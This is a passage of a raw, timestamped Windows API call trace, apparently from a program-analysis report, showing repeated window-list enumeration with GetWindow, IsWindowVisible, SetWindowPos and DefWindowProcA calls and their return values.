0x1005c [0057.636] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.636] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.636] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.636] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.636] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.636] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.636] GetWindow (hWnd=0x1003e, uCmd=0x2) 
returned 0x1003a [0057.636] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.636] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.636] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.636] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.636] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.636] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.636] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.636] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.636] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.636] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.636] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.636] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.636] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.637] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.637] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.637] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.637] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.637] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.637] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.637] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.637] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.637] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.637] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.637] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.637] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.637] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.637] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.637] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.637] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.637] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.637] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.637] GetWindow (hWnd=0x1017e, 
uCmd=0x2) returned 0x10178 [0057.637] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.637] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.637] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.637] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.637] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.637] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.638] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.638] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.638] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.638] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.638] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.638] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.638] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.638] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.638] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.638] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.638] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.638] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.638] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.638] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.638] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.638] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.638] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.638] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.638] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.638] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.638] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.638] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.638] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.638] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.638] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.639] 
GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.639] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.639] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.639] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.639] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.639] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.639] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.639] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.639] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.639] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.639] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.639] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.639] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.639] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.639] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.639] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.639] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.639] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.639] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.639] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.639] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.639] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.639] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.639] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.639] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.639] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.640] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.640] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.640] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.640] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.640] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.640] GetWindow (hWnd=0x10050, uCmd=0x2) returned 
0x200fa [0057.640] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.640] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.640] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.640] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.640] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.640] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.640] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.640] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.640] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.640] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.640] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.640] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.640] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.640] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.640] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.640] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.640] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.641] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.641] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.641] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.641] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.641] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.641] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.641] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.641] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.641] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.641] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.641] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.641] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.641] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 
[0057.641] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.641] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.641] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.641] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.641] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.641] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.641] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.641] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.641] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.641] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.641] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.641] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.641] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.641] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.641] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.641] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.641] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.641] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.641] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.641] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.642] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.642] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.642] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.642] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.642] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.642] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.642] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.642] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.642] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.642] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.642] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.642] GetWindow (hWnd=0x10186, uCmd=0x2) returned 
0x10180 [0057.642] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.642] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.642] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.642] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.642] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.642] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.642] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.642] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.642] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.642] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.642] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.642] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.642] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.642] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.642] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.642] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.642] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.642] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.642] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.642] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.643] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.643] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.643] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.643] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.643] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.643] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.643] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.643] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.643] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.643] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.643] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.643] GetWindow (hWnd=0x10142, 
uCmd=0x2) returned 0x10138 [0057.643] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.643] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.643] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.643] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.643] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.643] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.643] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.643] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.643] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.643] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.643] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.643] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.643] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.643] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.643] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.643] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.643] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.643] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.643] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.643] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.644] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.644] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.644] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.644] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.644] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.644] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.644] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.644] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.644] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.644] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.644] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.644] 
GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.644] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.644] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.644] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.644] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.644] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.644] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.644] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.644] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.644] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.644] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.644] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.644] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.644] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.644] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.644] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.644] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.644] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.644] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.645] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.645] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.645] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.645] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.645] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.645] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.645] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.645] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.645] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.645] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.645] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.645] GetWindow 
(hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.645] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.645] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.645] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.645] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.645] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.645] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.645] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.645] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.645] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.645] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.645] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.645] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.645] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.645] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.646] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.646] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.646] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.646] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.646] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.646] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.646] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.646] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.646] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.646] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.646] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.646] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.646] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.646] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.646] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.646] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.646] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.646] 
GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.646] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.646] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.646] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.646] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.646] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.646] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.646] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.646] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.646] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.646] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.646] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.646] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.646] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.646] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.646] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.647] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.647] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.647] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.647] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.647] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.647] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.647] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.647] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.647] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.647] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.647] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.647] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.647] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.647] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.647] 
IsWindowVisible (hWnd=0x601a8) returned 0 [0057.647] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.648] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.648] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.648] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.648] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.648] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.648] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.648] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.648] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.648] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.648] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.648] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.648] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.648] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.648] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.648] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.648] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.649] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.649] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.649] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.649] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.649] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.649] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.649] GetWindow 
(hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.649] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.649] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.649] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.649] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.649] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.649] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.649] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.649] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.649] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.649] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.649] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.650] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.650] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.650] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.650] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.650] IsWindowVisible (hWnd=0x601a8) 